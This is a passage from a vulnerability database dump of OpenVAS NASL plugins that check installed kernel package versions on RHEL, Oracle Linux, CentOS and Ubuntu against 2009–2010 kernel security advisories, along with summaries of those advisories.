= \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:35:58", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2010-0046", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310122396", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122396", "title": "Oracle Linux Local Check: ELSA-2010-0046", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2010-0046.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122396\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:18:14 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2010-0046\");\n script_tag(name:\"insight\", value:\"ELSA-2010-0046 - kernel security and bug fix update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2010-0046\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2010-0046.html\");\n script_cve_id(\"CVE-2009-2910\", \"CVE-2009-3080\", \"CVE-2009-3556\", \"CVE-2009-3889\", \"CVE-2009-3939\", \"CVE-2009-4020\", \"CVE-2009-4021\", \"CVE-2009-4138\", \"CVE-2009-4141\", \"CVE-2009-4272\", \"CVE-2006-6304\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~164.11.1.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~164.11.1.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~164.11.1.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~164.11.1.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~164.11.1.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~164.11.1.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~164.11.1.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~164.11.1.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~164.11.1.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~164.11.1.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~164.11.1.0.1.el5~1.4.4~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~164.11.1.0.1.el5PAE~1.4.4~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~164.11.1.0.1.el5debug~1.4.4~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~164.11.1.0.1.el5xen~1.4.4~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~164.11.1.0.1.el5~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~164.11.1.0.1.el5PAE~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~164.11.1.0.1.el5debug~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~164.11.1.0.1.el5xen~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2017-07-25T10:55:36", "bulletinFamily": "scanner", "description": "Check for the Version of kernel", "modified": "2017-07-10T00:00:00", "published": "2011-08-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=880643", "id": "OPENVAS:880643", "title": "CentOS Update for kernel CESA-2010:0046 centos5 i386", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2010:0046 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n Security fixes:\n \n * an array index error was found in the gdth driver. A local user could\n send a specially-crafted IOCTL request that would cause a denial of service\n or, possibly, privilege escalation. (CVE-2009-3080, Important)\n \n * a flaw was found in the FUSE implementation. When a system is low on\n memory, fuse_put_request() could dereference an invalid pointer, possibly\n leading to a local denial of service or privilege escalation.\n (CVE-2009-4021, Important)\n \n * Tavis Ormandy discovered a deficiency in the fasync_helper()\n implementation. This could allow a local, unprivileged user to leverage a\n use-after-free of locked, asynchronous file descriptors to cause a denial\n of service or privilege escalation. (CVE-2009-4141, Important)\n \n * the Parallels Virtuozzo Containers team reported the RHSA-2009:1243\n update introduced two flaws in the routing implementation. If an attacker\n was able to cause a large enough number of collisions in the routing hash\n table (via specially-crafted packets) for the emergency route flush to\n trigger, a deadlock could occur. Secondly, if the kernel routing cache was\n disabled, an uninitialized pointer would be left behind after a route\n lookup, leading to a kernel panic. (CVE-2009-4272, Important)\n \n * the RHSA-2009:0225 update introduced a rewrite attack flaw in the\n do_coredump() function. A local attacker able to guess the file name a\n process is going to dump its core to, prior to the process crashing, could\n use this flaw to append data to the dumped core file. This issue only\n affects systems that have "/proc/sys/fs/suid_dumpable" set to 2 (the\n default value is 0). (CVE-2006-6304, Moderate)\n \n The fix for CVE-2006-6304 changes the expected behavior: With suid_dumpable\n set to 2, the core file will not be recorded if the file already exists.\n For example, core files will not be overwritten on subsequent crashes of\n processes whose core files map to the same name.\n \n * an information leak was found in the Linux kernel. On AMD64 systems,\n 32-bit processes could access and read certain 64-bit registers by\n temporarily switching themselves to 64-bit mode. (CVE-2009-2910, Moderate)\n \n * the RHBA-2008:0314 update introduced N_Port ID Virtualization (NPIV)\n support in the qla2xxx driver, resulting in two new sysfs pseudo files,\n "/sys/class/scsi_host/[a qla2xxx host]/vport_create" and "vport_delete".\n These two files were world-writable by default, allowing a local user to\n change SCSI host at ... \n\n Description truncated, for more information please check the Reference URL\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"kernel on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2010-January/016479.html\");\n script_id(880643);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2010:0046\");\n script_cve_id(\"CVE-2006-6304\", \"CVE-2009-2910\", \"CVE-2009-3080\", \"CVE-2009-3556\", \"CVE-2009-3889\", \"CVE-2009-3939\", \"CVE-2009-4020\", \"CVE-2009-4021\", \"CVE-2009-4138\", \"CVE-2009-4141\", \"CVE-2009-4272\");\n script_name(\"CentOS Update for kernel CESA-2010:0046 centos5 i386\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:18:17", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-894-1", "modified": "2017-12-01T00:00:00", "published": "2010-02-08T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=840383", "id": "OPENVAS:840383", "title": "Ubuntu Update for Linux kernel vulnerabilities USN-894-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_894_1.nasl 7965 2017-12-01 07:38:25Z santu $\n#\n# Ubuntu Update for Linux kernel vulnerabilities USN-894-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Amerigo Wang and Eric Sesterhenn discovered that the HFS and ext4\n filesystems did not correctly check certain disk structures. If a user\n were tricked into mounting a specially crafted filesystem, a remote\n attacker could crash the system or gain root privileges. (CVE-2009-4020,\n CVE-2009-4308)\n\n It was discovered that FUSE did not correctly check certain requests.\n A local attacker with access to FUSE mounts could exploit this to\n crash the system or possibly gain root privileges. Ubuntu 9.10 was not\n affected. (CVE-2009-4021)\n \n It was discovered that KVM did not correctly decode certain guest\n instructions. A local attacker in a guest could exploit this to\n trigger high scheduling latency in the host, leading to a denial of\n service. Ubuntu 6.06 was not affected. (CVE-2009-4031)\n \n It was discovered that the OHCI fireware driver did not correctly\n handle certain ioctls. A local attacker could exploit this to crash\n the system, or possibly gain root privileges. Ubuntu 6.06 was not\n affected. (CVE-2009-4138)\n \n Tavis Ormandy discovered that the kernel did not correctly handle\n O_ASYNC on locked files. A local attacker could exploit this to gain\n root privileges. Only Ubuntu 9.04 and 9.10 were affected. (CVE-2009-4141)\n \n Neil Horman and Eugene Teo discovered that the e1000 and e1000e\n network drivers did not correctly check the size of Ethernet frames.\n An attacker on the local network could send specially crafted traffic\n to bypass packet filters, crash the system, or possibly gain root\n privileges. (CVE-2009-4536, CVE-2009-4538)\n \n It was discovered that "print-fatal-signals" reporting could show\n arbitrary kernel memory contents. A local attacker could exploit\n this, leading to a loss of privacy. By default this is disabled in\n Ubuntu and did not affect Ubuntu 6.06. (CVE-2010-0003)\n \n Olli Jarva and Tuomo Untinen discovered that IPv6 did not correctly\n handle jumbo frames. A remote attacker could exploit this to crash the\n system, leading to a denial of service. Only Ubuntu 9.04 and 9.10 were\n affected. (CVE-2010-0006)\n \n Florian Westphal discovered that bridging netfilter rules could be\n modified by unprivileged users. A local attacker could disrupt network\n traffic, leading to a denial of service. (CVE-2010-0007)\n \n Al Viro discovered that certain mremap operations could leak kernel\n memory. A local attacker could exploit this to consume all available\n memory, leading to a denial of service. (CVE-2010-0291)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-894-1\";\ntag_affected = \"Linux kernel vulnerabilities on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 8.10 ,\n Ubuntu 9.04 ,\n Ubuntu 9.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-894-1/\");\n script_id(840383);\n script_version(\"$Revision: 7965 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:38:25 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-08 11:34:22 +0100 (Mon, 08 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"894-1\");\n script_cve_id(\"CVE-2009-4020\", \"CVE-2009-4021\", \"CVE-2009-4031\", \"CVE-2009-4138\", \"CVE-2009-4141\", \"CVE-2009-4308\", \"CVE-2009-4536\", \"CVE-2009-4538\", \"CVE-2010-0003\", \"CVE-2010-0006\", \"CVE-2010-0007\", \"CVE-2010-0291\");\n script_name(\"Ubuntu Update for Linux kernel vulnerabilities USN-894-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.28-18-generic\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.28-18-server\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.28-18-generic\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.28-18-server\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.28-18-virtual\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc-2.6.28\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.28-18\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.28\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-386\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-686\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-k7\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-server-bigiron\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-server\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-386\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-686\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-k7\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-server-bigiron\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-server\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc-2.6.15\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-kernel-devel\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.15\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.27-17-generic\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.27-17-server\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.27-17-generic\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.27-17-server\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.27-17-virtual\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc-2.6.27\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 